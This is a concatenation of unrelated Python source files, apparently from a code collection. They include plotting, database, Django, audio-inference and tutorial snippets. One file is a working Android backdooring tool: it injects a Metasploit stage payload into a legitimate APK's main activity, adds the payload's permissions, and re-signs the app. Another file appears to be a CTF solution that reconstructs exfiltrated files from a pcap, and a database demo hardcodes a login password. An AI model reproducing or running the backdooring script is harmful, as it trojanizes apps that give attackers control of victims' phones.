ref_total = 1.0 / float(a200[dmax - 1 - time_range + 1]) * (-float(a200[dmax - 1 - time_range + 1]) + float(a200[dmax - 1])) + 1.0
if ( ngain == 0 ):
avg_gain = 'NA'
else:
avg_gain = total_gain / ngain
if ( nloss == 0 ):
avg_loss = 'NA'
else:
avg_loss = total_loss / nloss
print ntrade, ' ', ngain, ' ', nloss, ' ', avg_gain, ' ', avg_loss, total, ref_total, (total-ref_total)/ref_total*100
#figure()
x = arange(1, time_range + 1, 1)
subplot(nsubplots,1,ibalance)
xlim([1,time_range])
plot( x, total_vector )
#title(name.upper() + ' Balance and Gain/Loss in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
xindex = []
xdate = []
xinterval = 5
for i in range( 0, xinterval ):
xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
# print int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) )
xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
xindex.append( time_range )
xdate.append( str( date200[dmax - 1] ) )
xticks(xindex, xdate, fontsize=12)
ylabel('Balance (USD)', fontsize=16)
grid(True)
subplot(nsubplots,1,igain)
xlim([1,time_range])
vlines( x, [0], gain_result_vector, lw=4 )
axhline(0, color='black')
xticks(xindex, xdate, fontsize=12)
xlabel('Date', fontsize=16)
ylabel('Gain (USD)', fontsize=16)
grid(True)
#figure()
#x = arange(1, time_range + 1, 1)
#subplot(nsubplots,1,3)
#xlim([1,time_range])
#plot( x, total_vector )
#title(name.upper() + ' Balance and Gain/Loss in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
#xindex = []
#xdate = []
#xinterval = 5
#for i in range( 0, xinterval ):
# xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
# print int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) )
# xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
#xindex.append( time_range )
#xdate.append( str( date200[dmax - 1] ) )
#xticks(xindex, xdate, fontsize=12)
#ylabel('Balance (USD)', fontsize=16)
#grid(True)
#subplot(nsubplots,1,4)
#xlim([1,time_range])
#vlines( x, [0], gain_result_vector, lw=4 )
#axhline(0, color='black')
#xticks(xindex, xdate, fontsize=12)
#xlabel('Date', fontsize=16)
#ylabel('Gain (USD)', fontsize=16)
#grid(True)
savefig( './figures/' + name.upper() + '_' + periodText + '.pdf' )
|
434 | 75133dd924f8f3f028075c5d2109bb79ddc7fe87 | import pymysql
def testeSelect(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
# ไฝฟ็จ execute() ๆนๆณๆง่ก SQL ๆฅ่ฏข
cur1.execute("SELECT VERSION()")
# ไฝฟ็จ fetchone() ๆนๆณ่ทๅๅๆกๆฐๆฎ.
data = cur1.fetchone()
print(dir(data))
print ("cur1 : %s " % cur1)
print ("Database version : %s " % data)
def dropTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
cur1.execute("drop table if exists python_demo")
print('dropTable',cur1)
def createTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
sql = '''
CREATE TABLE IF NOT EXISTS python_demo (
MEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT 'ไผๅID',
MEMBER_CODE VARCHAR(20) NOT NULL COMMENT 'ไผๅไปฃ็ ',
MEMBER_NAME VARCHAR(128) NOT NULL COMMENT 'ๅ
ฌๅธไธญๆๅ็งฐ',
MEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ฎ็งฐ',
COMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ่ฑๆๅ็งฐ',
REG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆณจๅๅฐๅ',
REG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆณจๅๅฐๅ',
ENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆง่ดจ',
REGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT 'ๆณจๅ่ตๆฌ',
REG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๆณจๅ่ตๆฌๅธ็ง',
JUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT 'ๆณไบบๅ็งฐ',
BUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ป่ฅ่ๅด',
COM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ต่ฏ',
COM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธไผ ็',
PERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ่ด่ดฃไบบ',
ZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '้ฎ็ผ',
CON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบๅงๅ',
CON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบๆๆบ',
CON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบ้ฎ็ฎฑ',
CON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบไผ ็',
CON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถ็ฑปๅ',
CON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถๅท',
CON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถๅคฑๆๆถ้ด',
CON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่บซไปฝ่ฏๆญฃ้ขID',
CON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่บซไปฝ่ฏๅ้ขID',
THERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไธ่ฏๅไธๆ ๅฟ',
BIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งID',
BIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งไปฃ็ ',
BIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งๅคฑๆๆถ้ด',
TAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '็จๅก็ญ็บง่ฏไนฆID',
TAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '็จๅก็ป่ฎฐๅท',
TAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '็จๅก็ป่ฎฐๅคฑๆๆถ้ด',
ORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '็ป็ปๆบๆไปฃ็ ่ฏID',
ORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '็ป็ปๆบๆไปฃ็ ',
ORGREG_DATE DATE NULL DEFAULT NULL COMMENT '็ป็ปๆบๆๅคฑๆๆถ้ด',
BANK_ID INT(20) NULL DEFAULT NULL COMMENT '้ถ่กๅผๆท่ฎธๅฏ่ฏID',
BANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก็ฑปๅซ',
BANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก',
BANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก็ผ็ ',
BANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '้ถ่ก่ดฆๅท',
BANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '้ถ่กๆทไธป',
INVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจๅฐๅคด',
INVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจๅฐๅ',
INVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจ่ฏฆ็ปๅฐๅ',
APPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '็ณ่ฏทๅฎกๆ ธๆบๆ',
BUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไนฐๅฎถๆ ่ฏ',
SELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถๆ ่ฏ',
THIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '็ฌฌไธๆนๆ ่ฏ',
MAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT 'ไธป่ดฆๅทID',
MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDMไธปๆฐๆฎCODE',
ERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERPไผๅCODE',
REG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๆณจๅ็ฑปๅ',
STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไผๅ็ถๆ',
AUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธไบบ',
AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๆถ้ด',
AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธ็ปๆ',
AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๆ่ง',
MDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธไบบ',
MDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธๆถ้ด',
MDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธๆ่ง',
MDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธ็ปๆ',
MEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT 'ๅๆดID',
CHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๆด็ถๆ',
ALIVE_FLAG VARCHAR(1) NOT NULL COMMENT 'ๅฝๅๆๆ็ถๆ',
LANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '่ฏญ่จ็ฑปๅ',
CREATE_USER INT(20) NOT NULL COMMENT 'ๅๅปบ่
',
CREATE_DATE DATETIME NOT NULL COMMENT 'ๅๅปบๆถ้ด',
UPDATE_USER INT(20) NULL DEFAULT NULL COMMENT 'ไฟฎๆน่
',
UPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT 'ไฟฎๆนๆถ้ด',
DELETE_USER INT(20) NULL DEFAULT NULL COMMENT 'ๅ ้ค่
',
DELETE_DATE DATETIME NULL DEFAULT NULL COMMENT 'ๅ ้คๆถ้ด',
BUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไนฐๅฎถ็ฑปๅ(01๏ผไธชไบบไนฐๅฎถ๏ผ02๏ผๅ
ฌๅธไนฐๅฎถ)',
AUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธ่บซไปฝๆ ่ฏ(01๏ผๅนณๅฐ๏ผ02๏ผๅๅฎถ)',
AUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๅๅฎถID(ๅฝๅฎกๆ ธ่บซไปฝๆ ่ฏไธบๅๅฎถๅฎกๆ ธๆถ๏ผๅฎกๆ ธ็ๅๅฎถID)',
SELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถMDM็ณป็ป',
SELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถSAP็ณป็ป',
SELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถMDM็ณป็ปๆฐๆฎCODE',
IS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '้ปๅๅ็ถๆ(41๏ผๆฏ๏ผ0๏ผๅฆ)',
INVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '็จๆทๆๅฑๅบๅ-็',
INVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '็จๆทๆๅฑๅบๅ-ๅธ',
PRIMARY KEY (MEMBER_ID)
)
COMMENT='ไผๅไฟกๆฏ่กจ'
COLLATE='utf8_general_ci'
ENGINE=InnoDB
'''
cur1.execute(sql)
print('createTabl',cur1)
def selectTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
cur1.execute("select member_name,MEMBER_CODE,member_id from python_demo limit 10")
# ไฝฟ็จ fetchall() ๆฅๆถๅ
จ้จ็่ฟๅ็ปๆ่ก
data = cur1.fetchall()
for index,item in enumerate(data):
print(index,sep=' ', end=' ')
for index2,item2 in enumerate(item):
print(item2,sep=' ', end=' ')
print("")
def insertTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
cur1.execute("INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', 'ไธญๅฝๆ้ๅ
ฌๅธ', 'ไธญๅฝๆ้ๅ
ฌๅธ', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)")
# ไฝฟ็จ fetchall() ๆฅๆถๅ
จ้จ็่ฟๅ็ปๆ่ก
#data = cur1.rowcount()
#print('insertTable',data)
# ๆๅผๆฐๆฎๅบ่ฟๆฅ
db = pymysql.connect(host='127.0.0.1',user='pu3147',
password='1qaz@WSX',database='demo',port=3306,charset='UTF8')
dropTable(db)
createTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
testeSelect(db)
selectTable(db)
# ๅ
ณ้ญๆฐๆฎๅบ่ฟๆฅ
db.close()
|
435 | fcc73647a5e841bcb5ea4fcd06579cc6912cfe1e | #!/usr/bin/env python
import os
import re
import pycolor
import sys
pyc = pycolor.pyColor()
def decompile(mainapk):
print pyc.Info("Decompiling apks...")
os.system("bash apktool.sh d -f %s"%mainapk)
os.system("bash apktool.sh d -f temp.apk")
def inject(mainapk):
print pyc.Info("Injecting payload...")
mk = "mkdir %s/smali/com/metasploit"%mainapk.split('.')[0]
os.system(mk)
mk = "mkdir %s/smali/com/metasploit/stage"%mainapk.split('.')[0]
os.system(mk)
cp = "cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/"%mainapk.split('.')[0]
os.system(cp)
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.read()
fhandle.close()
fread = fread.split('<action android:name="android.intent.action.MAIN"/>')[0].split('<activity android:')[1]
acn = re.search('android:name=\"[\w.]+',fread)
activityname = acn.group(0).split('"')[1]
acpath = activityname.replace('.','/') + ".smali"
smalipath = "%s/smali/%s"%(mainapk.split('.')[0], acpath)
fhandle = open(smalipath,'r')
fread = fhandle.read()
fhandle.close()
print pyc.Info("Injecting hooks in %s..."%activityname)
fhalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[0]
shalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[1]
injection = ";->onCreate(Landroid/os/Bundle;)V\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
total = fhalf + injection + shalf
fhandle = open(smalipath,'w')
fhandle.write(total)
fhandle.close()
print pyc.Succ("Hook injected -> metasploit/stage/Payload")
def permissions(mainapk):
print pyc.Info("Adding permissions...")
filemanifest = "temp/AndroidManifest.xml"
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
prmns = []
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
fhandle.close()
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
half=[]
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
else:
half.append(line)
prmns = set(prmns)
fhandle.close()
fhandle = open(filemanifest,'w')
for i in half:
if half.index(i)==2:
for j in prmns:
fhandle.write(j+"\n")
else:
fhandle.write(i)
for i in prmns:
print '\t',i.split('android:name="')[1].split('"')[0]
print pyc.Succ("%d Permissions added."%(len(prmns)))
def rebuild(mainapk):
print pyc.Info("Recompiling...")
rebuild = "bash apktool.sh b -f %s"%mainapk.split('.')[0]
os.system(rebuild)
print pyc.Info("Signing apk...")
path = "%s/dist/%s"%(mainapk.split('.')[0],mainapk)
signapk = "java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk"%(path,mainapk[:-4])
os.system(signapk)
print pyc.Succ("Successfully backdoored and saved as %s-final.apk"%mainapk[:-4])
|
436 | de347b41cd88947690cb42e043880a80d81e2c5c | # Generated by Django 3.2.7 on 2021-09-11 19:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cryptocurrency', '0012_rename_cancel_exists_order_cancel_exist'),
]
operations = [
migrations.AlterField(
model_name='order',
name='created_at',
field=models.IntegerField(blank=True, null=True),
),
]
|
437 | c26bdc3f47aa9ac0cda0334e97bdaf3f9d56eb6c | import re
import os
import base64
os.popen("tshark -r log.pcap -d 'tcp.port==57000,http' -d 'tcp.port==44322,http' -d 'tcp.port==44818,http' -Y 'data-text-lines' -Tfields -e http.file_data > request")
def evals(text):
template = "{}\['__doc__'\]\[\d+\]"
keys = map(str, range(10))
keys += ['\[\]','\(\)',"''"]
rule = '|'.join(template.format(_) for _ in keys)
regex = re.compile(rule + "|'[\w|\d]'")
for i in regex.findall(text):
r = i.replace("['__doc__']", ".__doc__")
r = re.sub('^\d', 'int', r)
r = re.sub('^\(\)', 'tuple', r)
text = text.replace(i, eval(r))
text = text.replace('\n', '\\n')
return text.replace('~','')
def extract(text):
regex = re.compile(r'-s (\d+) -l \d+ ([\w\.]+)\).*\[(\d+)\].*\((\w|\d|\\n)\)')
return regex.findall(text)[0]
requ = open('request').readlines()[:]
result = dict()
for x in requ:
clean = x.strip('\n')
clean = re.sub(r'\\n', '', clean)
clean = base64.b64decode(clean)
clean = evals(clean.split('=')[1])
if 'index' in clean:
index, name, pos, char = extract(clean)
key = result.get(name, dict())
index = int(index)
pos = int(pos)
if not key:
result[name] = key
lastIndexed = result[name].get(index, dict())
if not lastIndexed:
result[name][index] = lastIndexed
lastOccurence = result[name][index].get(pos, [''])
if not lastOccurence[0]:
result[name][index][pos] = lastOccurence
lastOccurence[0] = (index, pos, char)
for k,v in result.iteritems():
print '[+] Saving', k
temp = ''
for kk in sorted(v):
vv = result[k][kk]
for kkk in sorted(vv):
vvv = result[k][kk][kkk]
char = vvv[0][-1]
if char != '\\n':
temp += vvv[0][-1]
with open(k, 'wb') as f:
content = temp.decode('hex')
f.write(content) |
438 | 8e85740123467889bdeb6b27d5eaa4b39df280ed | from .celery import app
from home.models import Banner
from settings.const import BANNER_COUNT
from home.serializers import BannerModelSerializer
from django.core.cache import cache
from django.conf import settings
@app.task
def update_banner_list():
# ่ทๅๆๆฐๅ
ๅฎน
banner_query = Banner.objects.filter(is_delete=False, is_show=True).order_by('-orders')[:BANNER_COUNT]
# ๅบๅๅ
banner_data = BannerModelSerializer(banner_query, many=True).data
for banner in banner_data:
banner['image'] = settings.END_BASE_URL + banner['image']
# ๆดๆฐ็ผๅญ
cache.set('banner_list', banner_data)
return True
|
439 | a2421a8673a524c32539555596711a71a8e00dbf | import os
import argparse
import torch
import model.model as module_arch
from utils.util import remove_weight_norms
from train import get_instance
from librosa import load
from librosa.output import write_wav
from time import time
def main(config, resume, infile, outfile, sigma, dur, half):
# build model architecture
model = get_instance(module_arch, 'arch', config)
model.summary()
# load state dict
checkpoint = torch.load(resume)
state_dict = checkpoint['state_dict']
if config['n_gpu'] > 1:
model = torch.nn.DataParallel(model)
model.load_state_dict(state_dict)
if config['n_gpu'] > 1:
model = model.module
model.apply(remove_weight_norms)
# prepare model for testing
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = model.to(device)
model.eval()
sr = config['arch']['args']['sr']
y, _ = load(infile, sr=sr, duration=dur)
y = torch.Tensor(y).to(device)
# get mel before turn to half, because sparse.half is not implement yet
mel = model.get_mel(y[None, :])
if half:
model = model.half()
mel = mel.half()
start = time()
x = model.infer(mel, sigma)
cost = time() - start
print("Time cost: {:.4f}, Speed: {:.4f} kHz".format(cost, x.numel() / cost / 1000))
# print(x.max(), x.min())
write_wav(outfile, x.cpu().float().numpy(), sr, False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='WaveGlow inference')
parser.add_argument('infile', type=str, help='wave file to generate mel-spectrogram')
parser.add_argument('outfile', type=str, help='output file name')
parser.add_argument('--duration', type=float, help='duration of audio, in seconds')
parser.add_argument('--half', action='store_true')
parser.add_argument('-s', '--sigma', type=float, default=1.0)
parser.add_argument('-r', '--resume', default=None, type=str,
help='path to latest checkpoint (default: None)')
parser.add_argument('-d', '--device', default=None, type=str,
help='indices of GPUs to enable (default: all)')
args = parser.parse_args()
if args.resume:
config = torch.load(args.resume)['config']
if args.device:
os.environ["CUDA_VISIBLE_DEVICES"] = args.device
main(config, args.resume, args.infile, args.outfile, args.sigma, args.duration, args.half)
|
440 | 23a560c5f5553fc32329121ea47f8a7ae1196889 | import requests
import time
while 1:
r = requests.put("http://localhost:3000/api/4", data={"temperature": 24, "led": 1})
print r.text
time.sleep(1) |
441 | 6154979cd2853dd2bd26d1ae5df7365efa0141c2 | from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
|
442 | 813354c9c294c0323c1b54cda7074fbffa49cdb3 | from django.utils import timezone
from factory import DjangoModelFactory
from djtriggers.tests.models import DummyTrigger
class DummyTriggerFactory(DjangoModelFactory):
class Meta:
model = DummyTrigger
trigger_type = 'dummy_trigger_test'
source = 'tests'
date_received = timezone.now()
date_processed = None
process_after = None
number_of_tries = 0
|
443 | aebc918d6a1d1d2473f74d77b8a915ac25548e3a | import cachetools
cache = cachetools.LRUCache(maxsize = 3)
cache['PyCon'] = 'India'
cache['year'] = '2017'
print("Older: " + cache['year'])
cache['year'] = '2018'
print("Newer: " + cache['year'])
print(cache)
cache['sdate'] = '05/09/2018'
print(cache)
cache['edate'] = '09/09/2018'
print(cache) |
444 | d7ce6efa72c9b65d3dd3ce90f9d1f2dd8a889d26 |
'''
syntax of if-elif-else
if <condition> :
code to be
executed in
this condition
elif <new condition> :
cdode tbd
some code
else :
code runs in the else condigtion
this can all be multiline code
'''
a = 3
b = 2
if a == b :
print "Values are equal"
elif a < b :
print "a is less than b"
else:
print "b is less than a"
print "jai is awesome"
# attempting to make changes in git
# jai making changes
|
445 | cd234911c1f990b8029dfa792d132847bf39a6aa |
import math
def vol_shell(r1, r2):
a=abs((4/3)*math.pi*((r1**3)-(r2**3)))
return round(a,3)
print(vol_shell(3,3))
|
446 | 7b5713c9a5afa911df1c2939751de30412162f15 | from collections import OrderedDict
import copy
import numpy as np
from scipy.optimize import curve_fit
from ... import Operation as opmod
from ...Operation import Operation
from ....tools import saxstools
class SpectrumFit(Operation):
"""
Use a measured SAXS spectrum (I(q) vs. q),
to optimize the parameters of a theoretical SAXS spectrum
for one or several populations of scatterers.
Works by minimizing an objective function that compares
the measured spectrum against the theoretical result.
TODO: document the algorithm here.
Input arrays of q and I(q),
a string indicating choice of objective function,
a dict of features describing the spectrum,
and a list of strings indicating which keys in the dict
should be used as optimization parameters.
The input features dict includes initial fit parameters
as well as the flags indicating which populations to include.
The features dict is of the same format as
SpectrumProfiler and SpectrumParameterization outputs.
Outputs a return code and the features dict,
with entries updated for the optimized parameters.
Also returns the theoretical result for I(q),
and a renormalized measured spectrum for visual comparison.
"""
def __init__(self):
input_names = ['q','I','flags','params','fit_params','objfun']
output_names = ['params','q_I_opt']
super(SpectrumFit, self).__init__(input_names, output_names)
self.input_doc['q'] = '1d array of wave vector values in 1/Angstrom units'
self.input_doc['I'] = '1d array of intensity values I(q)'
self.input_doc['flags'] = 'dict of flags indicating what populations to fit'
self.input_doc['params'] = 'dict of initial values for the scattering equation parameters '\
'for each of the populations specified in the input flags'
self.input_doc['fit_params'] = 'list of strings (keys) indicating which parameters to optimize'
self.input_doc['objfun'] = 'string indicating objective function for optimization: '\
+ 'see documentation of saxstools.fit_spectrum() for supported objective functions'
self.output_doc['params'] = 'dict of scattering equation parameters copied from inputs, '\
'with values optimized for all keys specified in fit_params'
self.output_doc['q_I_opt'] = 'n-by-2 array of q and the optimized computed intensity spectrum'
self.input_type['q'] = opmod.workflow_item
self.input_type['I'] = opmod.workflow_item
self.input_type['flags'] = opmod.workflow_item
self.input_type['params'] = opmod.workflow_item
self.inputs['objfun'] = 'chi2log'
def run(self):
f = self.inputs['flags']
if f['bad_data'] or not any([f['precursor_scattering'],f['form_factor_scattering'],f['diffraction_peaks']]):
self.outputs['params'] = {}
return
if f['diffraction_peaks']:
self.outputs['params'] = {'ERROR_MESSAGE':'diffraction peak fitting not yet supported'}
return
q, I = self.inputs['q'], self.inputs['I']
m = self.inputs['objfun']
p = self.inputs['params']
fitkeys = self.inputs['fit_params']
#p_opt = copy.deepcopy(p)
# Set up constraints as needed
c = []
if f['form_factor_scattering'] or f['diffraction_peaks']:
c = ['fix_I0']
# Fitting happens here
p_opt = saxstools.fit_spectrum(q,I,m,f,p,fitkeys,c)
I_opt = saxstools.compute_saxs(q,f,p_opt)
nz = ((I>0)&(I_opt>0))
logI_nz = np.log(I[nz])
logIopt_nz = np.log(I_opt[nz])
Imean = np.mean(logI_nz)
Istd = np.std(logI_nz)
logI_nz_s = (logI_nz - Imean) / Istd
logIopt_nz_s = (logIopt_nz - Imean) / Istd
f['R2log_fit'] = saxstools.compute_Rsquared(np.log(I[nz]),np.log(I_opt[nz]))
f['chi2log_fit'] = saxstools.compute_chi2(logI_nz_s,logIopt_nz_s)
q_I_opt = np.array([q,I_opt]).T
self.outputs['features'] = f
self.outputs['q_I_opt'] = q_I_opt
|
447 | 595912753d778a0fa8332f0df00e06a9da5cde93 | ################################################################################
# #
# This file is part of the Potato Engine (PE). #
# #
# Copyright (C) 2007-2010 ElectroMagnetic Potatoes (EMP). #
# See the AUTHORS file for more information. #
# #
# This library is free software; you can redistribute it and/or #
# modify it under the terms of the GNU Lesser General Public #
# License as published by the Free Software Foundation; either #
# version 2.1 of the License, or (at your option) any later version. #
# #
# This library is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# Lesser General Public License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import os
import build
################################################################
